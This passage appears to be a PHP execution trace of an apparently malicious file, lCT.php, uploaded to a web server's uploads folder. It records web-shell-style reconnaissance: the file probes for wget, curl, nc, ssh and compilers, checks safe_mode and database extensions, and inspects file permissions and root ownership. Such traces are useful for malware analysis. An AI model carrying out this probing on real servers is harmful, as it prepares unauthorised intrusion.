3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1923	0	0.097643	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1923	1	0.097656	725920
4	1923	R			TRUE
4	1924	0	0.097670	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which wget'	''
4	1924	1	0.098853	726424
4	1924	R			'/usr/bin/wget'
4	1925	0	0.098878	726320	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/wget']
4	1925	1	0.098894	726384
4	1925	R			'/usr/bin/wget'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/wget'
3	1922	1	0.098921	725920
3	1922	R			'/usr/bin/wget'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/wget'
3	1926	0	0.098948	725880	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/wget'
3	1926	1	0.098962	725912
3	1926	R			13
2	1921	1	0.098980	725840
2	1921	R			13
1		A						/var/www/html/uploads/lCT.php	174	$x++
1		A						/var/www/html/uploads/lCT.php	175	$downloader .= 'wget, '
2	1927	0	0.099015	725872	which	1		/var/www/html/uploads/lCT.php	173	1	'fetch'
3	1928	0	0.099029	725912	exe	1		/var/www/html/uploads/lCT.php	370	1	'which fetch'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1929	0	0.099052	725912	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1929	1	0.099065	725952
4	1929	R			TRUE
4	1930	0	0.099078	725936	exec	0		/var/www/html/uploads/lCT.php	259	2	'which fetch'	''
4	1930	1	0.100249	726056
4	1930	R			''
4	1931	0	0.100272	725992	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1931	1	0.100286	726056
4	1931	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1928	1	0.100312	725912
3	1928	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1927	1	0.100335	725872
2	1927	R			FALSE
2	1932	0	0.100350	725872	which	1		/var/www/html/uploads/lCT.php	173	1	'lynx'
3	1933	0	0.100363	725912	exe	1		/var/www/html/uploads/lCT.php	370	1	'which lynx'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1934	0	0.100385	725912	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1934	1	0.100400	725952
4	1934	R			TRUE
4	1935	0	0.100413	725936	exec	0		/var/www/html/uploads/lCT.php	259	2	'which lynx'	''
4	1935	1	0.101637	726056
4	1935	R			''
4	1936	0	0.101660	725992	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1936	1	0.101675	726056
4	1936	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1933	1	0.101700	725912
3	1933	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1932	1	0.101724	725872
2	1932	R			FALSE
2	1937	0	0.101738	725872	which	1		/var/www/html/uploads/lCT.php	173	1	'links'
3	1938	0	0.101752	725912	exe	1		/var/www/html/uploads/lCT.php	370	1	'which links'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1939	0	0.101774	725912	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1939	1	0.101788	725952
4	1939	R			TRUE
4	1940	0	0.101801	725936	exec	0		/var/www/html/uploads/lCT.php	259	2	'which links'	''
4	1940	1	0.102962	726056
4	1940	R			''
4	1941	0	0.102985	725992	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1941	1	0.102999	726056
4	1941	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1938	1	0.103024	725912
3	1938	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1937	1	0.103049	725872
2	1937	R			FALSE
2	1942	0	0.103062	725872	which	1		/var/www/html/uploads/lCT.php	173	1	'curl'
3	1943	0	0.103076	725912	exe	1		/var/www/html/uploads/lCT.php	370	1	'which curl'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1944	0	0.103099	725912	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1944	1	0.103113	725952
4	1944	R			TRUE
4	1945	0	0.103126	725936	exec	0		/var/www/html/uploads/lCT.php	259	2	'which curl'	''
4	1945	1	0.104320	726456
4	1945	R			'/usr/bin/curl'
4	1946	0	0.104345	726352	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/curl']
4	1946	1	0.104362	726416
4	1946	R			'/usr/bin/curl'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/curl'
3	1943	1	0.104388	725952
3	1943	R			'/usr/bin/curl'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/curl'
3	1947	0	0.104416	725912	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/curl'
3	1947	1	0.104430	725944
3	1947	R			13
2	1942	1	0.104446	725872
2	1942	R			13
1		A						/var/www/html/uploads/lCT.php	174	$x++
1		A						/var/www/html/uploads/lCT.php	175	$downloader .= 'curl, '
2	1948	0	0.104480	725880	which	1		/var/www/html/uploads/lCT.php	173	1	'get'
3	1949	0	0.104493	725920	exe	1		/var/www/html/uploads/lCT.php	370	1	'which get'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1950	0	0.104521	725920	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1950	1	0.104535	725960
4	1950	R			TRUE
4	1951	0	0.104548	725944	exec	0		/var/www/html/uploads/lCT.php	259	2	'which get'	''
4	1951	1	0.105729	726064
4	1951	R			''
4	1952	0	0.105753	726000	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1952	1	0.105767	726064
4	1952	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1949	1	0.105792	725920
3	1949	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1948	1	0.105816	725880
2	1948	R			FALSE
2	1953	0	0.105830	725880	which	1		/var/www/html/uploads/lCT.php	173	1	'lwp-mirror'
3	1954	0	0.105844	725928	exe	1		/var/www/html/uploads/lCT.php	370	1	'which lwp-mirror'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1955	0	0.105868	725928	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1955	1	0.105882	725968
4	1955	R			TRUE
4	1956	0	0.105895	725952	exec	0		/var/www/html/uploads/lCT.php	259	2	'which lwp-mirror'	''
4	1956	1	0.107121	726488
4	1956	R			'/usr/bin/lwp-mirror'
4	1957	0	0.107146	726376	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/lwp-mirror']
4	1957	1	0.107163	726440
4	1957	R			'/usr/bin/lwp-mirror'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/lwp-mirror'
3	1954	1	0.107191	725976
3	1954	R			'/usr/bin/lwp-mirror'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/lwp-mirror'
3	1958	0	0.107217	725928	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/lwp-mirror'
3	1958	1	0.107231	725960
3	1958	R			19
2	1953	1	0.107244	725880
2	1953	R			19
1		A						/var/www/html/uploads/lCT.php	174	$x++
1		A						/var/www/html/uploads/lCT.php	175	$downloader .= 'lwp-mirror, '
2	1959	0	0.107282	725896	scandir	0		/var/www/html/uploads/lCT.php	773	1	'/var/www/html/uploads'
2	1959	1	0.107314	726512
2	1959	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'lCT.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/lCT.php	773	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'lCT.php', 5 => 'prepend.php']
2	1960	0	0.107356	726480	clear	1		/var/www/html/uploads/lCT.php	802	0
2	1960	1	0.107368	726480
2	1961	0	0.107469	726592	phpversion	0		/var/www/html/uploads/lCT.php	972	0
2	1961	1	0.107483	726656
2	1961	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	1962	0	0.107502	726592	formatSize	1		/var/www/html/uploads/lCT.php	980	1	232015802368
2		A						/var/www/html/uploads/lCT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/lCT.php	212	$i = 0
3	1963	0	0.107541	726592	count	0		/var/www/html/uploads/lCT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1963	1	0.107557	726624
3	1963	R			5
2		A						/var/www/html/uploads/lCT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/lCT.php	212	$i++
3	1964	0	0.107590	726592	count	0		/var/www/html/uploads/lCT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1964	1	0.107605	726624
3	1964	R			5
2		A						/var/www/html/uploads/lCT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/lCT.php	212	$i++
3	1965	0	0.107635	726592	count	0		/var/www/html/uploads/lCT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1965	1	0.107650	726624
3	1965	R			5
2		A						/var/www/html/uploads/lCT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/lCT.php	212	$i++
3	1966	0	0.107680	726592	round	0		/var/www/html/uploads/lCT.php	213	2	216.08155441284	2
3	1966	1	0.107694	726664
3	1966	R			216.08
2	1962	1	0.107709	726632
2	1962	R			'216.08 GB'
2	1967	0	0.107723	726592	formatSize	1		/var/www/html/uploads/lCT.php	980	1	201108824064
2		A						/var/www/html/uploads/lCT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/lCT.php	212	$i = 0
3	1968	0	0.107760	726592	count	0		/var/www/html/uploads/lCT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1968	1	0.107779	726624
3	1968	R			5
2		A						/var/www/html/uploads/lCT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/lCT.php	212	$i++
3	1969	0	0.107810	726592	count	0		/var/www/html/uploads/lCT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1969	1	0.107824	726624
3	1969	R			5
2		A						/var/www/html/uploads/lCT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/lCT.php	212	$i++
3	1970	0	0.107853	726592	count	0		/var/www/html/uploads/lCT.php	212	1	[0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
3	1970	1	0.107869	726624
3	1970	R			5
2		A						/var/www/html/uploads/lCT.php	212	$bytes /= 1024
2		A						/var/www/html/uploads/lCT.php	212	$i++
3	1971	0	0.107897	726592	round	0		/var/www/html/uploads/lCT.php	213	2	187.29718780518	2
3	1971	1	0.107911	726664
3	1971	R			187.3
2	1967	1	0.107925	726632
2	1967	R			'187.3 GB'
2	1972	0	0.107941	726592	rtrim	0		/var/www/html/uploads/lCT.php	996	2	'gcc, cc, ld, make, php, perl, tar, gzip, nc, git, ssh, '	', '
2	1972	1	0.107957	726744
2	1972	R			'gcc, cc, ld, make, php, perl, tar, gzip, nc, git, ssh'
2	1973	0	0.107973	726592	rtrim	0		/var/www/html/uploads/lCT.php	1000	2	'wget, curl, lwp-mirror, '	', '
2	1973	1	0.107988	726712
2	1973	R			'wget, curl, lwp-mirror'
2	1974	0	0.108003	726592	function_exists	0		/var/www/html/uploads/lCT.php	1003	1	'curl_version'
2	1974	1	0.108017	726632
2	1974	R			TRUE
2	1975	0	0.108030	726592	function_exists	0		/var/www/html/uploads/lCT.php	1003	1	'ssh2_connect'
2	1975	1	0.108044	726632
2	1975	R			FALSE
2	1976	0	0.108058	726592	function_exists	0		/var/www/html/uploads/lCT.php	1003	1	'get_magic_quotes_gpc'
2	1976	1	0.108071	726632
2	1976	R			TRUE
2	1977	0	0.108084	726592	function_exists	0		/var/www/html/uploads/lCT.php	1003	1	'mysql_get_client_info'
2	1977	1	0.108098	726632
2	1977	R			FALSE
2	1978	0	0.108111	726592	class_exists	0		/var/www/html/uploads/lCT.php	1003	1	'mysqli'
2	1978	1	0.108124	726632
2	1978	R			FALSE
2	1979	0	0.108138	726592	function_exists	0		/var/www/html/uploads/lCT.php	1003	1	'mssql_connect'
2	1979	1	0.108151	726632
2	1979	R			FALSE
2	1980	0	0.108164	726592	function_exists	0		/var/www/html/uploads/lCT.php	1003	1	'pg_connect'
2	1980	1	0.108177	726632
2	1980	R			FALSE
2	1981	0	0.108190	726592	function_exists	0		/var/www/html/uploads/lCT.php	1003	1	'oci_connect'
2	1981	1	0.108203	726632
2	1981	R			FALSE
2	1982	0	0.108216	726592	ini_get	0		/var/www/html/uploads/lCT.php	1006	1	'safe_mode'
2	1982	1	0.108229	726624
2	1982	R			FALSE
2	1983	0	0.108243	726592	ini_get	0		/var/www/html/uploads/lCT.php	1006	1	'safe_mode_exec_dir'
2	1983	1	0.108256	726624
2	1983	R			FALSE
2	1984	0	0.108269	726592	ini_get	0		/var/www/html/uploads/lCT.php	1006	1	'safe_mode_include_dir'
2	1984	1	0.108282	726624
2	1984	R			FALSE
2	1985	0	0.108296	726592	count	0		/var/www/html/uploads/lCT.php	1020	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2	1985	1	0.108312	726624
2	1985	R			5
1		A						/var/www/html/uploads/lCT.php	1020	$numDir = 5
1		A						/var/www/html/uploads/lCT.php	1021	$id = 0
1		A						/var/www/html/uploads/lCT.php	1021	$id = 1
1		A						/var/www/html/uploads/lCT.php	1031	$i = 0
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1021	$id = 2
1		A						/var/www/html/uploads/lCT.php	1031	$i = 0
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1021	$id = 3
1		A						/var/www/html/uploads/lCT.php	1031	$i = 0
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1031	$i++
1		A						/var/www/html/uploads/lCT.php	1021	$id = 4
2	1986	0	0.108485	726592	perms	1		/var/www/html/uploads/lCT.php	1041	1	'/var/www/html/uploads'
3	1987	0	0.108499	726592	fileperms	0		/var/www/html/uploads/lCT.php	218	1	'/var/www/html/uploads'
3	1987	1	0.108514	726656
3	1987	R			16895
2		A						/var/www/html/uploads/lCT.php	218	$perms = 16895
2		A						/var/www/html/uploads/lCT.php	228	$info = 'd'
2		A						/var/www/html/uploads/lCT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	250	$info .= 'x'
3	1988	0	0.108632	726656	sprintf	0		/var/www/html/uploads/lCT.php	251	2	'%o'	16895
3	1988	1	0.108647	727040
3	1988	R			'40777'
3	1989	0	0.108660	726976	substr	0		/var/www/html/uploads/lCT.php	251	2	'40777'	-4
3	1989	1	0.108673	727072
3	1989	R			'0777'
2	1986	1	0.108686	726664
2	1986	R			'0777 >> drwxrwxrwx'
2	1990	0	0.108701	726664	checkPerm	1		/var/www/html/uploads/lCT.php	1041	2	'/var/www/html/uploads'	'0777 >> drwxrwxrwx'
3	1991	0	0.108716	726664	explode	0		/var/www/html/uploads/lCT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	1991	1	0.108731	727184
3	1991	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/lCT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	1992	0	0.108759	727112	is_writable	0		/var/www/html/uploads/lCT.php	310	1	'/var/www/html/uploads'
3	1992	1	0.108775	727152
3	1992	R			TRUE
3	1993	0	0.108788	727112	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	1993	1	0.108800	727176
3	1993	R			'0777'
3	1994	0	0.108814	727432	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	1994	1	0.108826	727496
3	1994	R			'0777'
2	1990	1	0.108839	727048
2	1990	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads\'> drwxrwxrwx</font>'
2	1995	0	0.108864	726616	is_readable	0		/var/www/html/uploads/lCT.php	1052	1	'/var/www/html/uploads'
2	1995	1	0.108878	726656
2	1995	R			TRUE
2	1996	0	0.108892	726664	is_dir	0		/var/www/html/uploads/lCT.php	1069	1	'/var/www/html/uploads/.'
2	1996	1	0.108906	726704
2	1996	R			TRUE
2	1997	0	0.108921	726616	filetype	0		/var/www/html/uploads/lCT.php	1081	1	'.'
2	1997	1	0.108935	726696
2	1997	R			'dir'
2	1998	0	0.108948	726624	filemtime	0		/var/www/html/uploads/lCT.php	1083	1	'.'
2	1998	1	0.108962	726648
2	1998	R			1676251247
2	1999	0	0.108975	726608	date	0		/var/www/html/uploads/lCT.php	1083	2	'Y-m-d h:i:s'	1676251247
2	1999	1	0.109014	727776
2	1999	R			'2023-02-13 08:20:47'
2	2000	0	0.109032	727448	getowner	1		/var/www/html/uploads/lCT.php	1084	1	'.'
3	2001	0	0.109045	727448	function_exists	0		/var/www/html/uploads/lCT.php	321	1	'posix_getpwuid'
3	2001	1	0.109059	727488
3	2001	R			TRUE
3	2002	0	0.109072	727448	fileowner	0		/var/www/html/uploads/lCT.php	322	1	'.'
3	2002	1	0.109085	727488
3	2002	R			0
3	2003	0	0.109097	727448	posix_getpwuid	0		/var/www/html/uploads/lCT.php	322	1	0
3	2003	1	0.109124	728248
3	2003	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	323	$downer = 'root'
3	2004	0	0.109220	727480	function_exists	0		/var/www/html/uploads/lCT.php	327	1	'posix_getgrgid'
3	2004	1	0.109234	727520
3	2004	R			TRUE
3	2005	0	0.109247	727480	filegroup	0		/var/www/html/uploads/lCT.php	328	1	'.'
3	2005	1	0.109260	727520
3	2005	R			0
3	2006	0	0.109272	727480	posix_getgrgid	0		/var/www/html/uploads/lCT.php	328	1	0
3	2006	1	0.109300	728136
3	2006	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	329	$dgrp = 'root'
2	2000	1	0.109346	727488
2	2000	R			'root/root'
2	2007	0	0.109361	727544	perms	1		/var/www/html/uploads/lCT.php	1085	1	'/var/www/html/uploads/.'
3	2008	0	0.109373	727544	fileperms	0		/var/www/html/uploads/lCT.php	218	1	'/var/www/html/uploads/.'
3	2008	1	0.109388	727600
3	2008	R			16895
2		A						/var/www/html/uploads/lCT.php	218	$perms = 16895
2		A						/var/www/html/uploads/lCT.php	228	$info = 'd'
2		A						/var/www/html/uploads/lCT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	250	$info .= 'x'
3	2009	0	0.109506	727600	sprintf	0		/var/www/html/uploads/lCT.php	251	2	'%o'	16895
3	2009	1	0.109520	727984
3	2009	R			'40777'
3	2010	0	0.109533	727920	substr	0		/var/www/html/uploads/lCT.php	251	2	'40777'	-4
3	2010	1	0.109546	728016
3	2010	R			'0777'
2	2007	1	0.109559	727608
2	2007	R			'0777 >> drwxrwxrwx'
2	2011	0	0.109573	727560	checkPerm	1		/var/www/html/uploads/lCT.php	1085	2	'/var/www/html/uploads/.'	'0777 >> drwxrwxrwx'
3	2012	0	0.109587	727560	explode	0		/var/www/html/uploads/lCT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	2012	1	0.109601	728080
3	2012	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/lCT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	2013	0	0.109629	728008	is_writable	0		/var/www/html/uploads/lCT.php	310	1	'/var/www/html/uploads/.'
3	2013	1	0.109645	728048
3	2013	R			TRUE
3	2014	0	0.109659	728008	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	2014	1	0.109670	728072
3	2014	R			'0777'
3	2015	0	0.109683	728328	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	2015	1	0.109695	728392
3	2015	R			'0777'
2	2011	1	0.109708	727944
2	2011	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/.\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/.\'> drwxrwxrwx</font>'
2	2016	0	0.109733	727520	is_dir	0		/var/www/html/uploads/lCT.php	1069	1	'/var/www/html/uploads/..'
2	2016	1	0.109747	727568
2	2016	R			TRUE
2	2017	0	0.109761	727472	dirname	0		/var/www/html/uploads/lCT.php	1074	1	'/var/www/html/uploads'
2	2017	1	0.109773	727552
2	2017	R			'/var/www/html'
2	2018	0	0.109787	727472	filetype	0		/var/www/html/uploads/lCT.php	1081	1	'..'
2	2018	1	0.109801	727544
2	2018	R			'dir'
2	2019	0	0.109815	727472	filemtime	0		/var/www/html/uploads/lCT.php	1083	1	'..'
2	2019	1	0.109829	727488
2	2019	R			1676251247
2	2020	0	0.109842	727448	date	0		/var/www/html/uploads/lCT.php	1083	2	'Y-m-d h:i:s'	1676251247
2	2020	1	0.109858	727776
2	2020	R			'2023-02-13 08:20:47'
2	2021	0	0.109872	727448	getowner	1		/var/www/html/uploads/lCT.php	1084	1	'..'
3	2022	0	0.109885	727448	function_exists	0		/var/www/html/uploads/lCT.php	321	1	'posix_getpwuid'
3	2022	1	0.109898	727488
3	2022	R			TRUE
3	2023	0	0.109910	727448	fileowner	0		/var/www/html/uploads/lCT.php	322	1	'..'
3	2023	1	0.109923	727488
3	2023	R			0
3	2024	0	0.109935	727448	posix_getpwuid	0		/var/www/html/uploads/lCT.php	322	1	0
3	2024	1	0.109958	728248
3	2024	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/lCT.php	323	$downer = 'root'
3	2025	0	0.110009	727480	function_exists	0		/var/www/html/uploads/lCT.php	327	1	'posix_getgrgid'
3	2025	1	0.110027	727520
3	2025	R			TRUE
3	2026	0	0.110041	727480	filegroup	0		/var/www/html/uploads/lCT.php	328	1	'..'
3	2026	1	0.110053	727520
3	2026	R			0
3	2027	0	0.110066	727480	posix_getgrgid	0		/var/www/html/uploads/lCT.php	328	1	0
3	2027	1	0.110087	728136
3	2027	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/lCT.php	329	$dgrp = 'root'
2	2021	1	0.110131	727488
2	2021	R			'root/root'
2	2028	0	0.110146	727560	perms	1		/var/www/html/uploads/lCT.php	1085	1	'/var/www/html/uploads/..'
3	2029	0	0.110159	727560	fileperms	0		/var/www/html/uploads/lCT.php	218	1	'/var/www/html/uploads/..'
3	2029	1	0.110173	727624
3	2029	R			16895
2		A						/var/www/html/uploads/lCT.php	218	$perms = 16895
2		A						/var/www/html/uploads/lCT.php	228	$info = 'd'
2		A						/var/www/html/uploads/lCT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	242	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/lCT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/lCT.php	247	$info .= 'w'
2		A						/var/www/html/uploads/lCT.php	250	$info .= 'x'
3	2030	0	0.110291	727624	sprintf	0		/var/www/html/uploads/lCT.php	251	2	'%o'	16895
3	2030	1	0.110303	728008
3	2030	R			'40777'
3	2031	0	0.110316	727944	substr	0		/var/www/html/uploads/lCT.php	251	2	'40777'	-4
3	2031	1	0.110329	728040
3	2031	R			'0777'
2	2028	1	0.110343	727632
2	2028	R			'0777 >> drwxrwxrwx'
2	2032	0	0.110357	727576	checkPerm	1		/var/www/html/uploads/lCT.php	1085	2	'/var/www/html/uploads/..'	'0777 >> drwxrwxrwx'
3	2033	0	0.110370	727576	explode	0		/var/www/html/uploads/lCT.php	309	2	'>>'	'0777 >> drwxrwxrwx'
3	2033	1	0.110390	728096
3	2033	R			[0 => '0777 ', 1 => ' drwxrwxrwx']
2		A						/var/www/html/uploads/lCT.php	309	$perm = [0 => '0777 ', 1 => ' drwxrwxrwx']
3	2034	0	0.110418	728024	is_writable	0		/var/www/html/uploads/lCT.php	310	1	'/var/www/html/uploads/..'
3	2034	1	0.110434	728064
3	2034	R			TRUE
3	2035	0	0.110447	728024	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	2035	1	0.110459	728088
3	2035	R			'0777'
3	2036	0	0.110473	728344	trim	0		/var/www/html/uploads/lCT.php	311	1	'0777 '
3	2036	1	0.110484	728408
3	2036	R			'0777'
2	2032	1	0.110497	727960
2	2032	R			'<font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/..\'>0777 </font> >> <font class=\'text-success\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0777\' data-bs-name=\'/var/www/html/uploads/..\'> drwxrwxrwx</font>'
2	2037	0	0.110522	727528	is_dir	0		/var/www/html/uploads/lCT.php	1069	1	'/var/www/html/uploads/.htaccess'
2	2037	1	0.110537	727568
2	2037	R			FALSE
2	2038	0	0.110551	727528	is_dir	0		/var/www/html/uploads/lCT.php	1069	1	'/var/www/html/uploads/data'
2	2038	1	0.110565	727568
2	2038	R			TRUE
2	2039	0	0.110579	727472	checkName	1		/var/www/html/uploads/lCT.php	1078	1	'data'
3	2040	0	0.110593	727472	strlen	0		/var/www/html/uploads/lCT.php	301	1	'data'
3	2040	1	0.110604	727504
3	2040	R			4
2	2039	1	0.110617	727472
2	2039	R			'data'
2	2041	0	0.110630	727472	filetype	0		/var/www/html/uploads/lCT.php	1081	1	'data'
2	2041	1	0.110644	727544
2	2041	R			'dir'
2	2042	0	0.110658	727472	filemtime	0		/var/www/html/uploads/lCT.php	1083	1	'data'
2	2042	1	0.110672	727488
2	2042	R			1676251247
2	2043	0	0.110685	727448	date	0		/var/www/html/uploads/lCT.php	1083	2	'Y-m-d h:i:s'	1676251247
2	2043	1	0.110701	727776
2	2043	R			'2023-02-13 08:20:47'
2	2044	0	0.110715	727448	getowner	1		/var/www/html/uploads/lCT.php	1084	1	'data'
3	2045	0	0.110727	727448	function_exists	0		/var/www/html/uploads/lCT.php	321	1	'posix_getpwuid'
3	2045	1	0.110740	727488
3	2045	R			TRUE
3	2046	0	0.110752	727448	fileowner	0		/var/www/html/uploads/lCT.php	322	1	'data'
3	2046	1	0.110769	727488
3	2046	R			0
3	2047	0	0.110781	727448	posix_getpwuid	0		/var/www/html/uploads/lCT.php	322	1	0
3	2047	1	0.110803	728248
3	2047	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
